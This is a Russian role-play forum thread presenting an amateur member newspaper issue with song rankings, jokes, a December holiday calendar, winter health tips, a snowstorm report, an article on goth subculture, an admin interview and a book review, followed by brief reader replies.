Водяные КВ

Объявление

Гордость ролевой:

Лучший поэт: Иная (Гротеск)
Лучший художник: Вопль Мечты (Шут)
Лучший писатель: Ракушка Морской Закат (Тальк)
Лучший игрок: Nikke
Лучший пиарщик: Водная (Король), Капель (Северус)
Помним и ждём: Ирония
О ролевой:
Ты когда-нибудь мечтал очутиться под водной гладью? Задерживать дыхание, нестись вперед, слушать тихий плеск воды? Или мечтал стать лесным воителем, отважно сражающимся с врагами родного племени? А, может быть, ты ждешь отличного общения, свободы самовыражения или долгих дискуссия на самые разные (порой, очень серьезные) темы? Тогда ты пришел по адресу!
И помни: все мы на 80% состоим из воды, но для кого-то она не просто жидкость, а смысл жизни!

Гл. админ:
Водная

Админы:
Иная
Капель

Модеры:
Вопль Мечты
Nikke
Тальк
Полезные ссылки:
Регистрация
Реклама
Правила
Важное
Помощь в игре
Объявления:
Срочно требуются воители в Клан Звёздной Реки!

И все... и все затихли, замолчали. Обидно как-то. Ведь идея форума интересная, мысли есть хорошие, планы, а так... Досадно. Люди, очень хочется снова сделать форум таким, какой он был буквально месяц назад. Пожалуйста, помогите мне в этом.
Наш форум участвует в Топе. Если хочешь нам помочь - пройди по этой ссылке: RPG TOP

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Водяные КВ » Water Cats-Writers » Второй выпуск


Второй выпуск

Сообщений 1 страница 30 из 34

1

http://savepic.org/1107669.jpg

http://savepic.org/1089246.png
Здравствуте, здравствуйте, здравстуйте, дорогие наши читатели. Я, Инн, снова обращаюсь к вам со своим традиционным, по идее ежемесячным (а так как мы кошки ленивые, то эта идея, увы, у нас не соблюдается) обращением главного редактора газеты WCW.
Я долго думала, что же можно написать в этой заметки, но так как из носа у меня постоянно лило, а кашель то и дело прерывал столь важный и творческий процесс, я решила, что и написать надо о здоровье.
Именно сейчас, когда я подхватила эту чертову простуду, я начала понимать, как же это все-таки обидно и печально болеть. Особенно в такое время, когда на улице лежит мягкий первый снег, когда веселый мороз щиплет за щеки и натягивает на лицо широкую улыбку, когда прохожие так живописно растягиваются посреди дороги, повинуясь силе земного притяжения и скользкости льда.
А нам, вечно простуженным журналистам, приходится смотреть на все это великолепие, сидя дома с печальной миной на лице и платком под рукой.
А ведь как просто было избежать этой неприятности! Ведь чтобы укрепить свой иммунитет осенью нужно выполнять всего лишь несколько простых правил.
Во-первых, нужно попытаться наплевать на моду, навязанную нам телевидением и надеть-таки удобные и теплые шапки, которые, я уверена, будут нашим читательницам очень идти. Во-вторых, я настоятельно вам рекомендую кушать побольше фруктов. Сочные апельсины, зеленые яблоки, жизнерадостная хурма! Что еще нужно для счастья?
Что может быть проще?
Впрочем, я почти уверена, что скоро я, и многие мои товарищи по несчастью, поправимся и начнем так же активно флудить, играть и творить, как и раньше. Пожелайте нам в этом удачи и простите нас за очередное опоздание, с которым вышел этот номер нашей газеты.
С наилучшими пожеланиями Инн. 
http://savepic.org/1071838.png
http://savepic.org/1050334.jpg
Нетрадиционные песни про зиму, Новый год и Рождество
Каждая зима и Новый год с Рождеством сопровождаются определённым репертуаром. «В лесу родилась Ёлочка», «Ой, мороз, мороз», «Happy New Year»… Все они уж который год облюбованы народом. Слова из подобных песен известны всем от мала до велика. Каждый конец года эти песни дребезжат в ушах. Каждый год их включают в кафе, на радио, на концертах, буквально везде. И каждый год мы готовы морально застрелиться, после прослушивания этих же песен в 50-ый раз, а ведь это ещё не предел!
Всё! Решено! Открываем свой рейтинг нетрадиционных песен в исполнении нетрадиционных групп!
10. Глюк'OZA – Снег идёт
Романтичная песня, про то, как по уши влюблённая девушка с именем созвучным с названием витаминов ждёт под окнами своего возлюбленного. И вот что странно – мне, как любительнице более умного, яркого и развитого направления, это песня понравилась. То ли необычные чувства, выраженные в тексте, то ли какая-то заколдованная музыка, то ли ещё что, но понравилась. На самом деле это не попса, скорее уже поп-рок, так что не пугайтесь особо по поводу происхождения этой песни.
9. Король и Шут - Санта Клаус
А за границей России в канун Рождества всё не так уж и спокойно. Вместо долгожданного доброго старичка на пороге домов появляется пьяный и сквернопахнущий упырь в костюме Санты, который даже и не собирается угощать и дарить подарки.  Но всё заканчивается наилучшим для народа образом. Весёлая и драйвовая песня поднимет ваше настроение, но при этом не будет заезженно-сладкой.
8. Земфира – Снег
Первое впечатление об этой песне у меня было очень положительное, даже настроение поднялось. Песня лёгкая, простая, но при этом душевная и радостная, что так соответствует наступающему празднику. Здесь даже больше поётся не про снег, а про жизнь… с участием снега. Советую послушать, ведь всегда приятно расслабится под мелодичный поп-рок, такой зимний и приятный.
7. Сектор Газа - Ночь перед Рождеством
Группа, как всегда, задействует в своих текстах нежить, а именно упырей. А что? Очень даже не плохо смотрится, к тому же, если всё кончается благополучно – герой спасся от нечистой силы, приехал к любимой Гале… Чем вам не счастливая (но при этом умеренно жуткая) история про ночь перед Рождеством?
6. Flёur - Последний танец зимы
Очаровательная баллада, посвящённая красотам зимы – снежной, прекрасной и величественной. Снег жемчужинами, просторы небес, прекрасный танец… Сказка, а не песня.
5. Кукрыниксы – Холодно
Герои, а именно влюблённая пара оказались «здесь». Девушка и парень пытаются хоть как-то выжить, хоть на пару минут, чтобы пожить ещё немного вместе. Казалось бы, положение безвыходное, но в конце всё происходит с точностью до наоборот – парень находит заклинание, чтобы преодолеть холод. Очаровательная и романтичная песня, что же ещё тут скажешь.
4. Приключение Электроников и Блондинка Ксю – Снежинка
«Песенка о снежинке? Она же традиционная!» - можете негодовать вы. Да, она самая что ни на есть традиционная. Но! В каком исполнении! По-моему мнению, эта перепевка самая лучшая из всех перепевок «Снежинки». Дуэт групп получился что надо, а вместе с ним и песня. Драйвовая, зажигательная, весёлая… В общем, это надо слышать!
3. Агата Кристи - Странное Рождество.
Праздник Рождества, по словам культовой группы, не так уж ярок, от него уже знобит… Да и ладно, если мутит – кто-то ведь кого-то убивает… Милый расслабляющий депрессняк разнообразит ряд весёлых и радостных песенок про Рождество.
2. Lumen - Зима
По-моему мнению самая-самая песня, из всех пронизанных надеждой. И ведь да, так парень хочет уйти от зимы, уйти в яркую Ямайку, но, видно не судьба. Вечно ему быть синим замёрзшим трупом в Уфе рядом с девушкой, в чьих глазах тоже зима. А может, это будет чем-то более лучшим в его судьбе, чем он предполагает? Кто знает… Пока это всего лишь спокойная и нежная песня.
1. Король и Шут - Ром
Действие разворачивается в городе, где пятую ночь подряд жители празднуют Новый год в местном трактире, распивая ром. Но вот ром в трактире кончается и тут начинается самое традиционное действие в такие праздники – драка и хаос. Всё, как всегда, только об этом не только говорится в анекдотах, но и поётся.
                            Вопль Мечты aka NaNime, только для газеты «WCW».

http://savepic.org/1098449.png
http://savepic.org/1080017.jpg
Ходит мужик по рынку с медведем. Все у него спрашивают: "Что ты ищешь? Кого ищешь?" А он отвечает:
- Да вот, мужик мне в прошлом году хомячка продал...
***
По итогам проверки школьных сочинений «Как я провел лето» было раскрыто: три грабежа, два теракта и найден убийца Джона Кеннеди.
***
Вот говорят, что блондинки не дуры. Моя жена брюнеткой была, вчера утром покрасилась в блондинку, а вечером устроила скандал - откуда в постели черные волосы?!
***
Разговаривают Коршун и Ежевика. Коршун:- Знаешь, вчера такое было! Значит, иду я и вижу: трое речных бьют одного из Ветра. Hу, я, разумеется, решил помочь...- А ты, оказывается, смелый! Hу и как, помог?- Конечно. Видел бы ты, как мы вчетвером его отмудохали! (by Варда Тень Ворона ©)
***
- Что делаешь?
- Да так, телевизор смотрю. По ТНТ передача про пришельцев и мутантов идёт.
- "Дом-2", что ли?
***
- Папа, я больше не пойду с тобой на санках кататься...
- Вези давай!
http://savepic.org/1061585.png
http://savepic.org/1070801.jpg
1 декабря
В этот день отмечается День борьбы со СПИДом. СПИД – наистрашнейшая болезнь или по-научному Синдром Приобретенного Иммунодефицита, от которого почти невозможно излечиться. Лишь на начальных стадиях недуг можно побороть, но как определить, что заражён СПИДом, если не желаешь пройти проверку? Это самая главная проблема – нежелание или страх. Казалось бы, малость, но сколько она может значить – либо уверенность в своём здоровье, либо выявление СПИДА на начальных стадиях. Всемирный день борьбы со СПИДом стал ежегодным событием в большинстве стран. Во многих странах организуются мероприятия, проводимых в течение недель и дней до и после официального празднования. Символом этого Дня стала красная ленточка в форме перевёрнутой буквы «V».
Мир (и наше ВКВ в первых рядах) против СПИДа!
4 декабря
Вы пользуетесь компьютером? Да, бред  я, конечно, спросила. Конечно да! Кто обычным, кто ноутбуком… Но ведь компьютером! А кто знает, когда день Рождения у этого чудо - устройства?
4 декабря 1948 года Государственный комитет Совета министров СССР по внедрению передовой техники в народное хозяйство зарегистрировал за номером 10475 изобретение И. С. Брука и Б. И. Рамеева — цифровую электронную вычислительную машину.  Это первый официально зарегистрированный документ, касающийся развития вычислительной техники в нашей стране. Этот день с полным правом назван днем рождения российской информатики.
У наших компьютеров день Рождение!
9 декабря
По инициативе ООН 9 декабря отмечается Международный день борьбы с коррупцией. В этот день была подписана Конвенция ООН. А что вообще такое коррупция? В Советском Энциклопедическом словаре дано такое толкование: прямое использование  должностным лицом прав, связанных с его должностью, в целях личного обогащения. По-нашему, по-простому, это  взятки, хищение бюджетных средств, «симпатия» в суде… мошенничество, грубо говоря.  А это далеко не справедливо. И именно в этот день все борются с коррупцией.
10 декабря
Оле! Оле-оле-оле! Эти крики часто можно услышать: по телевизору, в Интернете, да и от своих знакомых. И обозначают эти крики что? Правильно, поддерживание своих любимых футбольных команд. Кто ни разу не видел где-нибудь толпы или же одиноких людей, замотанных в пёстрые шарфы, скандирующие либо до боли знакомые слова «Оле!» или же «Динамо/Зенит/ ЦСКА/ Спартак…»? Знайте – это фанаты футбола. Догадались, к чему это я? Да, да, посвящается этот день футболу. Всемирный день футбола отмечается по решению ООН с 10 декабря. Таким образом, международное сообщество отдает дань этому виду спорта, который для многих миллионов не просто игра, а стиль жизни.
12 декабря
Конституция – главные законы страны. И теперь, 12 декабря, Россия отмечает День Конституции. Конституция несколько раз переживала кризис, но всё выстояла, как по поговорке о русской женщине, и коня на скаку остановила, и себя потом в порядок привела. Теперь она является ядром всей правовой системы России и определяет смысл и содержание других законов. Это вам не шутки уже!
  15 декабря
Так порой бывает приятно посидеть дома, за стенами от холода и мороза с кружечкой горячего чая. Да-да, чая. Этот день – День Чая, отмечается во всём мире, что уже говорит о популярности этого вкусного домашнего напитка. Хотя, в принципе, этот день ввели с целью привлечения внимания правительств и граждан к проблемам продажи чая, взаимосвязи между продажами чая и положением работников чайных производств, небольших производителей и потребителей, мы же видим совсем простую цель – как можно больше попить чая с малиной, черникой, смородиной, мятой или же просто чёрный с сахаром.
Приятного чаепития!
19 декабря
19 декабря мировое сообщество отмечает Международный день помощи бедным. По данным международных экспертов, на конец 20 века около четверти всего населения планеты, то есть полтора миллиарда человек, влачит нищенское существование. В связи с этим ООН принято несколько программ, ставящих своей целью искоренение нищеты. Помощь другим – святое дело.
20 декабря
22 декабря 2005 года Генеральная Ассамблея ООН провозгласила, что Международный день солидарности людей будет ежегодно отмечаться 20 декабря. Солидарность — единство убеждений и действий, взаимопомощь и поддержка членов социальной группы, основывающиеся на общности интересов и необходимости достижения общих групповых целей, совместная ответственность. Да взять, к примеру, нашу газету – чем не пример крепкой солидарности?
22 декабря
Свой профессиональный праздник энергетики отмечают в один из самых коротких световых дней в году — 22 декабря. Трудно переоценить значение работы энергетиков, чьим неустанным трудом создается одно из самых необходимых благ — тепло, которое обеспечивает комфорт в школах, больницах, офисах, да и в наших квартирах. А теперь представьте, что было бы без энергетиков. Да, второй Ледниковый период был обеспечен!
25 декабря
В этот день католики-христиане празднуют Рождество. Рождество является великим праздником, установленным в воспоминании о рождения Иисуса Христа. Рождество Христово — один из важнейших христианских праздников и государственный праздник в более чем 100 странах мира. Санта-Клаусы, подарки, ёлки, праздничные столы… Но пока не для нас. Нам же осталось ждать Нового года совсем не много – 6 дней. А вот тогда… *зловещий смех в редколлегии*
27 декабря
День спасателя в России установлен  26 ноября 1995 года, законом президента РФ «Об установлении Дня спасателя Российской Федерации». Необходимость создания МЧС в России была вызвана постоянно растущим количеством чрезвычайных ситуаций (ЧС) природного, техногенного и эпидемиологического характера. Подобные катастрофы нередко становятся причиной гибели и страдания людей, уничтожения материальных ценностей. Каждый выезд спасателей  – маленький подвиг. Разве надо забывать об этом дне?
28 декабря
28 декабря 1895 года в Париже в «Гранд-кафе» на бульваре Капуцинов прошел первый сеанс синематографа братьев Люмьер. Патент на тогдашний «синематограф» братья получили в том же 1895 году. Но тогда этот аппарат был ужасно великой редкостью. Зато теперь-то! «Синемапарк», «Титаник синема», «Киномакс»… всех и не пересчитать. Но ведь не только на больших экранах кино – в телевизоре они занимают первое место. Ну что бы мы делали без кино? Куда бы пошли с подругами развеяться? Где бы мы могли познакомиться с симпатичными парнями? Где, в конце концов, могли отдохнуть, мечтая при этом, или погружаясь в думы, или же просто смеясь? Да, кино незаменимо, как средства для отдыха. Разве что… Нет, не заменимо ничем.
31 декабря, наконец!
Новый год! Опять можно будет до отвала пировать, или же до потери пульса навеселиться с друзьями! Также можно насмотреться новогодних шоу, натанцеваться до упаду, разослать кучу поздравлений всем друзьям и близким, получить в ответ в два раза больше поздравлений, чем было отправлено, откреативить дом, ёлку, нарезаться салатов, набеситься, в конце концов! А на утро под традиционной ёлкой нас ждут… подарки! Хотя кому я это говорю? Вы и так всё знаете лучше меня!
С Новым годом!
http://savepic.org/1107664.png
http://savepic.org/1088208.jpg
Зимние минусы
Наконец-то пришла зима! Снег, каток, лыжи, снежки, горки… Как много возможностей открылось с приходом самого холодного сезона! А ведь ещё и Новый год не за горами! Сколько веселья нас ждёт!
Есть одно но. Зима - пора не только радости и смеха, но и нескольких проблем. Каких и как с ними бороться? Читайте далее.
Простуда
Кому не известно это слово? Даже спортсмены и космонавты, у которых железно-бетонное здоровье с ним знакомы. Слабость, головная боль, насморк, кашель, температура… Чудесно! А ведь всего этого можно было избежать. Как говорится: «Легче чем болезнь лечить, нам её предупредить». Что для этого нужно? Да всего ничего. Просто одеваться по погоде, а не по последнему писку моды; есть, как уже упомянула Иная, много фруктов и не есть мороженое, молочные коктейли и другие охладительные продукты на свежем воздухе, да и дома их лучше тоже употреблять как можно меньше. Ещё один способ – прививка. Прививка помогает натренировать организм до прихода болезни и давать ей отпор. Но есть ведь и те случаи, когда после укола вы сразу заболеваете или же у вас вместо «щита» появляется аллергия. В таких случаях лучше не делать прививку – вам же будет лучше. А что делать, если вы всё же простудились? У ВКВ есть на это ответы!
1. Имбирный чай. Этот чай, как можно догадаться, делается из имбиря, а именно из имбирного корня. Он достаточно специфичный, пахнет мятой, а горло жжёт почти как красный перец. Но это можно простить ему за его просто чудотворное действие (проверенно мной!). Рецепт и приготовление:
1,2 л воды, 3 столовой ложки натёртого имбиря, 6 столовых ложек сахара или 5 столовых ложек мёда, щепотка молотого чёрного перца, 4 столовых ложки лимонного (апельсинного) сока. В закипевшую воду бросаем натёртый имбирь, кипятим полученную смесь 10 минут. Добавляем сахар или мёд, растворяем. Процеживаем. Затем добавляем перец и лимонный сок. Пить горячим. Предупреждаю вас: чай надо запивать, а то ведь он и без того жгучий, а с лимоном, да ещё и горячим…
2. Тепло. Укатайтесь в шарф, две кофты, наденьте шерстяные носки. Спать, желательно, в таком же виде под тёплым одеялом. Не бойтесь, что вам жарко – тепло очень благотворно действует на заболевший организм.
3. Вода. Пейте как можно больше воды, при этом не газировки или сладких соков, а именно простой воды. 
4. Лампа. Если из носа течёт огромный поток… зелёной жидкости, то можно греть нос лампой. Не простой, а синей. Сначала высморкайтесь, затем 5 минут погрейте область переносицы. Но это в том случае, если нет температуры.
5. Сон. Больше спите. Если вы чувствуете в момент болезни слабость, головную боль, то лучше поспать, а не переносить всё это на своих ногах.
6. Сладости. Ешьте как можно меньше сладкого – сладости для болезни, что солнце в холод. Лучше кушайте полезные фрукты, типа яблок, лимонов, груш… Они и полезные, да и во вкусовых решениях не уступают конфеткам с шоколадками.
7. Бабушкины рецепты. Что это? Да это и есть народные средства – горячее молоко с мёдом на ночь, ягоды и лимоны. Пусть и народные средства, но помогают ведь!
Ну, теперь надеюсь, ваша болезнь будет очень короткой и без плохих последствий.
Бедные руки
Руки, конечно, не самые мягкие и нежные, но самые уязвимые. Как я сама выяснила, они страдают в мороз больше всех. Почему? А потому что многие не носят варежки, предпочитая кокетливые перчатки или же гетры. И всё это приводит к больным последствиям. Руки становятся шершавыми,  в худшем случае покрываются мелкими трещинками. Поверьте мне, это очень больно. Например, когда просто сжимаешь руку в кулак, трещинки раскрываются и оттуда, в моём случае, вытекают капельки крови. Лучше не представляйте это себе, просто поверьте на слово. Это очень больно и противно. Уберите модные перчатки в шкаф до более тёплых времён и достаньте мягкие пушистые шерстяные варежки. Но если случилось так, что руки уже «пострадали», выполните эти действия.
1. Промойте руки, дабы отчистить их.
2. Намажьте заживляющим кремом, типа «Бора», чтобы трещинки зажили.
3. Сразу же после этого намажьте руки кремом для рук – все они смягчают бедную кожу.
После этого руки снова станут нормальными, без шершавостей и трещинок. Но эти процедуры нужно выполнять не один раз, а несколько, так что будьте готовы.
Гололёд
Гололёд такая же неотъемлемая часть зимы, как и снег. Особенно часто он встречается при неожиданных оттепелях и последующих резких похолоданиях. Тогда и получаются всем известные "чпоки". Это ещё хорошо, если просто мягко упал на пятую точку, а если подставил руку, или же приземлился не правильно? Травматологов не избежать, зуб даю. А ведь всего этого тоже можно было избежать. Как бы не были заманчивы сапоги на высоких каблуках – гололёда в них не миновать. Лучше подберите удобную обувь, которая не только красивая и удобная, но и с хорошей подошвой, чтобы во время гололёда не кататься по городу, а нормально и цивильно идти.
Петарды и прочие искрящиеся шалости
Кто не слышал взрывы у себя под окнами? Думаю, таких нет. Не пугайтесь, это не вступление в Россию чужеземных войск, а петарды. Что она из себя представляет? Она не большая, но громкая, на радость мальчишкам и девчонкам. Я, как подросток, а не 6-ти летний ребёнок, не могу определить радость от этих громких штук. Но многие, а может даже и вы сами, находите смысл и радуйтесь появившейся в ваших руках коробочки с петардами. Главное будьте осторожны с ними, играйте, но не злоупотребляйте.
Также известны в наших краях и фейерверки с бенгальскими огоньками. Здесь при их использовании, тоже требуется не малая осторожность и аккуратность, чтобы зря не беспокоить пожарных. Как поётся в «Кино»: «Следи за собой, будь осторожен!».
Ну, теперь-то, ваши дни зимы не омрачаться неприятными последствиями. Желаем вам хорошо провести эту зиму в компании друзей, снега и прочего - прочего!
                                           Вопль Мечты aka NaNime, только для газеты «WCW».
http://savepic.org/1080016.png
http://i041.radikal.ru/1012/92/593d29a35f76.jpg
Лето закончилось, за ним пришла удивительно теплая осень, может, еще не остывшая от лета? Но этим вопросом поздно задаваться – уже, да-да, наступила зима и уже неделю царствует, так же принося сюрпризы.
Вам было мало жаркого, распепеляющего лета, вам захотелось аномального холода или погодных условий? Пожалуйста! Республика Татарстан, попавшая под влияние неповторимого циклона,  о котором и пойдет речь, на связи.
Всё начиналось тихо – мирно, как и бывает обычно в декабрьский день. Но снег шёл, шёл... Днём, вечером, ночью... (Завораживал и приковывал к окну, но как у нас повелось, домашка приковывает сильнее.)
http://i022.radikal.ru/1012/ea/131bce0229f7.jpg
Утром жители города встали и, выглнув в окно, ахнули: видимость стала ужасной, все заволокло туманом, а на деревьях, даже на оголенных ветках лежал снег, сантиметрами.
http://i032.radikal.ru/1012/c4/a33ec25ee53a.jpg

Что же стало причиной такого чуда? Спросят заинтересованные умы. Вот уже с начала декабря на нас напал циклон с Атлантического океана. За два дня выпала двухмесячная норма  осадков. Удивительно, неожиданно, но мы оказались в сказке. По утрам (особенно спросонья) кажется, что в город в гости зашла сама Снежная Королева и превратила его в своё царство – отмечу, что под хрустящими слоями снега скрывается прочный и очень скользкий лёд!
http://s51.radikal.ru/i134/1012/3a/088e3e8535fb.jpg

Как итог – снегоуброчные машины, отмена учебы на один день и сказка, сказка, сказка...
http://i050.radikal.ru/1012/db/40eaaa7e740d.jpg
И на этой реалистичной ноте статья подходит к логическому желанию и желает вам снежной сказки. Спасибо за прочтение.;)

*автор не удержался и влепила наконец этот смайл!
http://savepic.org/1051344.png
http://savepic.org/1054416.jpg
Предисловие
Готы. Кто о них не слышал?! Они, по-моему, являются самыми известными представителями субкультур. И где сейчас не встретишь этих «чёрных» людей – и фильмах, и в сериалах, и в книгах. И, разумеется, на улицах городов. Но что вы о них знаете? – ходят в чёрной одежде, думают о смерти… да и всё.
Многие поражаются «изысканной» и «экстравагантной» одеждой, неординарными интересами и «мистическими» местами встреч готов, или же наоборот презирают и не считают готов за нормальных людей. Но при этом, эти люди совершенно забывают или не знают, что такое готика, как субкультура, и с чем её едят. В этом я и попыталась разобраться и передать вам.
История
Субкультура готов появилась в 70-х годах на волнах пост-панка. Тогда панк - группы стали играть более депрессивную, мрачную музыку, настроенную на декаданс (настроение безнадёжности, неприятие жизни, индивидуализм).
Официальной датой Рождения этого неформального движения считается 1983 год, когда толпы молодёжи насмотрелась вампирский фильм «Голод». С тех самых пор готическое течение распространилось по миру. А журналисты в своё время окрестили их «готами», то есть «варварами».
Смысл
Они верят в бессмертие, нежить(в особенности в вампиров, даже пытаются быть похожими на них). Стиль готов включает в себя интерес ко всему мрачному, к мистике, к черным цветам в жизни. Этакие «похоронные люди».
Представители готики любят мрак больше света, ночь больше дня, луну больше солнца.
Готы считают себя высшими - им можно всё и никто не смеет это опровергнуть. А раз им можно всё, то и бессмертие, по их утверждению, им присуще. Символом готов стал анх – символ древнеегипетских царей, ведь бессмертия достойны лишь самые-самые.
Короче, у всех свои тараканы в голове…
Особенности
Но не только, далеко не только, по анху можно определить гота. У них свой особый имидж, своя музыка, свои фильмы и своя литература. Но обо всём по порядку.
Особенности: музыка
Их музыка, это наполненные депрессией и мраком готик - метал, готик – рок, пост-панк, альтернатива(см. предыдущий номер) и др. похожие жанры. Самые популярные исполнители среди готов – «Laсrimosa»,  «AKADO», Мерлин Менсон, «Nirvana», «Cradle of Filth», «Diary of Dreams», «Dominia». Тема депрессии, смерти, загробной жизни встречается достаточно часто, что стало отличительным признаком их музыки.
Особенности: мода
Мода – вот то, из-за чего так знамениты готы. Почему? А вы где-нибудь встречали обычных людей в цепях, в чёрных одеждах, с немыслимыми причёсками и «загробным» макияжем? Не сильно в этом уверенна.
За последние годы у готов сложился свой узнаваемый (даже очень-очень узнаваемый, самый узнаваемый!) стиль и имидж. Макияж готов – это чёрный, синий, фиолетовый,  красный цвета теней, подводки, грима, помады в сочетании с выбеленным лицом. Такой макияж готы используют не часто – в случаях праздников или фестивалей. Также на лице готов часто встречаются вставленные цепочки, пирсинг, иллюминаторы. Одежда по расцветке совпадает с макияжем. Некоторые готы предпочитают стиль 18 – 19 вв. – кружева, длинные перчатки и платья у женщин, фраки и цилиндры у мужчин. Но чаще встречаются элементы субкультуры металлистов – ирокезы, шипы, цепи, кожаная одежда. 
Как ни крути, а узнать их можно «с первого взгляда».
Особенности: кино и литература
Хотя готическая субкультура образовалась в первую очередь, как музыкальная, на ее развитие оказали влияние также литература и кинематограф. Следует подчеркнуть, что такого понятия, как «готический фильм» в кинематографе не существует. Зато есть определение ужасы, что очень совпадает со стилем и смыслом готики.
Готическим романом в XIX веке называли романтические и мистические «ужасы». Этот жанр был в основном распространён в англоязычной литературе. В отличие от более позднего хоррора, готические романы были более сосредоточены на психологических аспектах ужасного и таинственного, чем на натуралистичных подробностях. Ключевые авторы готических романов — Эдгар По, Мэри Шелли, Брем Стокер. К поздним представителям готического романа относят Говарда Лавкрафта и Энн Райс. Теперь же «готическими» романами можно назвать популярные книги Стефани Майер, Кристин Каст и многих других.
Эстетика готических романов распространилась и на кинематограф. Готические романы ужасов были экранизированы в таких известных чёрно-белых фильмах, как «Дракула», «Носферату: симфония ужаса» и «Франкенштейн». К концу 20 века, эстетика готического романа настолько вошла в популярную культуру, что стала постоянным предметом пародий, одна из самых известных — телесериал «Семейка Аддамс». Большой популярностью пользуются также фильмы и мультфильмы режиссёра Тима Бёртона, который нередко использует готическую моду и символику (вспомнить хотя бы героев «Трупа невесты» и «заботливую» маманю из другого мира из детского ужастика «Каролина в стране кошмаров»). Также нельзя не вспомнить о «Звонках», «Зеркалах» и «Проклятиях».
Существуют также и журналы, посвящённые готам и готике. Это: «Orkus», «Sacratum», « Zillo», « R.I.P.», «Dark Wave», «Dark City», « Gothica».
Заключение
Ну что ж, главная цель моей статьи, познакомить вас с субкультурой готов, выполнена! А вот презирать их теперь или восхищаться – решать вам и только вам.
                                                  Вопль Мечты aka NaNime, только для газеты «WCW».
http://savepic.org/1091283.png
1. Чем тебя привлекает форум Водяные КВ?
Скажем так, я просто никогда не бросаю то, чему когда-то помогала. Мне нравится видеть результат своей работы. Это уже привычка. Вот и сижу тут, с вами)
Хотя коллективчик забавный подобрался. Люблю вас.
2. Как ты думаешь, ВКВ большое будущее?
Нет, увы. Так как тема КВ, даже такая "извращенная", уже устарела. Думаю, через несколько лет, если мы все еще будем существовать, нам придется в корне менять тематику форума, что всегда стресс для любой организации, тем более такой хрупкой, как интернет сообщество.
3. Какие по твоему мнению минусы присутствуют на ролевой? И, если они есть, как их можно упразднить?
Из минусов хочу отметить низкую игровую активность людей. Мы пытаемся вводить разные игровые примочки, типо Флешбека или игрового мастера, но людям это, видимо, не интересно. Я понимаю, куда легче сидеть во флуде или обсуждать собственные клички, но играть тоже интересно! Я не хочу повторять ошибок других форумов, которые делали железные сюжеты, закрывая на их время флудилки и многие другие подфорумы (хотя, знаяя некоторых ленивых особ, можно было бы ), но, адекватно оценивая уровень наших людей, мне очень обидно, что игра стоит.
4.Ты считаешь, что коллектив старожил на форуме достаточно прочно закрепился, чтобы форум прожил ещё год?
Да, я в этом уверена. Сложно представить, чтобы Вопль, ты, Кап, Водя, Никке или кто-то еще бросил ВКВ. Хотя, кто знает, жизнь может очень круто повернуться. Все возможно, но я надеюсь на лучше.
5. Какие у тебя планы на развитие ВКВ?
Планирую-таки заставить вас поиграть чуток)
6. А было когда-нибудь такое чувство, что не хотелось заходить на ролевую?
Да, и такое бывало, не стану скрывать. Иногда очень хочется чего-то более активного и старого, но в этом беда всех юных форумов. Это нормально и правильно. Пока что на ВКВ нет ничего такого, что могло бы действительно заинтересовать проф.игроков, именно в этом причина нападок на наш форум.
7. И напоследок хочешь что-нибудь сказать?
Надеюсь, что когда-нибудь нам удастся поднять форум на совершенно иной уровень, превратив его в высокопрофессиональное местечко, которое, тем не менее, не потеряло свое очарование и уют. Надеюсь, когда-нибудь это будет.
С наступающим вас, читатели WCW.
http://savepic.org/1083091.png
http://savepic.org/1049299.jpg  http://savepic.org/1049301.jpg
Сегодня я хочу сравнить две замечательные книги современных популярных писателей «Звездная Бабочка» Бернара Вербера и «Метро 2033» Дмитрия Глуховского. Возможно, возникнет вопрос: как можно сравнивать постапокалиптический роман русского фантаста и трогательную притчу французского философа? Ответ прост: книги говорят об одном и том же: о надежде. О безумной, абсурдной надежде, которую так не хочется терять человечеству.
Действие обоих книг разворачивается в недалеком будущем, в мире, стоящим на грани исчезновения.
В плане атмосферы Глуховский, однозначно, выигрывает. Его мрачный, депрессивный мир, лишенный света дня, в который он поместил остатки некогда могучего человечества, поражает своим реализмом и правдивостью. Читая роман, буквально ощущаешь зябкое веяние из заброшенных туннелей, парализующий страх, который наводят искореженные радиацией монстры, безысходность, которой дышат все герои книги. Вербер сильно уступает своему оппоненту в этом вопросе. События его «Звездной Бабочки» разворачиваются на фоне вполне мирного «пейзажа» современной Земли. Однако некая тревога, ощущение близкого конца все же чувствуется. Но мне не хватило драматизма. Большая часть романа проходит на гигантском космическом корабле, на котором несколько тысяч людей пытаются спастись от безумия современности.
Далее стоит заметить, что сюжет обоих книг очень оригинален. Вербер размышляет на тему взаимодействия людей, запертых в тесном помещении, с себе подобными в течение долгого времени. Его герои проводят в вынужденном плене… 1000 лет! Много поколений сменится до того момента, пока корабль достигнет своей цели – другой галактики, в которой, по расчетом организаторов, есть планета, схожая с Землей. Автор доказывает, что любое человеческое общество развивается по косинусоиде. От идеального общества, искусственно созданного экспертами, люди скатываются во мрак первобытности… Но у них есть шанс начать все заново на Новой Планете, на которую смогут спуститься только двое лучших из 144 000 людей, начавших путешествие.
Глуховский создает более реалистичный роман. Действия «Метро» разворачиваются на фоне Москвы, разрушенной атомным ударом. В метро (совсем, как на космическом корабле Вербера) проживает всего несколько тысяч человек. Автор неоднократно задает себе вопрос: почему спастись смогли именно эти люди? Было ли это случайностью или это предначертано свыше? Однако события, которые становятся основой романа, меня разочаровали. Банальнейшая тема спасения человечества главным героем, лишенная изюминки. Да, русский фантаст все-таки вводит элемент неожиданности, замечая в конце книги, что «зло», на самом деле, было всего лишь новой ступенью развития человечества, которое изжило себя. Этот момент, пожалуй, единственно ценный в плане сюжета во всей книги.
Теперь поговорим о философии. Здесь ответ однозначен: Вербер неподражаем. Его метафоричная история заставляет задуматься, прочувствовать всю безнадежность нынешнего человечества, изменить во многом свою жизнь. В этом вопросе Глуховский сильно уступает своему французскому коллеге. В его романе, конечно, есть интересные в плане философии моменты, но они довольно примитивны и просты.
Итак, подводя итог, хочу заметить, что Вербер будет интересен более взрослым читателям, а Глуховский – наоборот, более юным.
Спасибо за внимание.
Иная.

0

2

мурр, вы просто мего!
теперь я знаю, что мне читать в недалеком будущей (эт я про Бабочку ^^ ), знаю, что надо послушать
ока читала, улыбка не хотела сползать с лица
просто молодечики!
с наступающим Новым Годом и выпуском, так ведь? ^^

0

3

Ребята... Класс!

0

4

Fiere
Таа!
Ракушка Морской Закат
Мур тебе, пушистая. Самой нравится. Простите за задержку)

0

5

мне понравилось))))

0

6

Водная
Fiere
Ракушка Морской Закат
Спасибо, девчонки! ^^ Всё только для вас!

0

7

здорово :з
очень хочу помочь вам :з
можете меня для оформления взять?
буду помогать с диза-айном...
*шаркает ножкой*

0
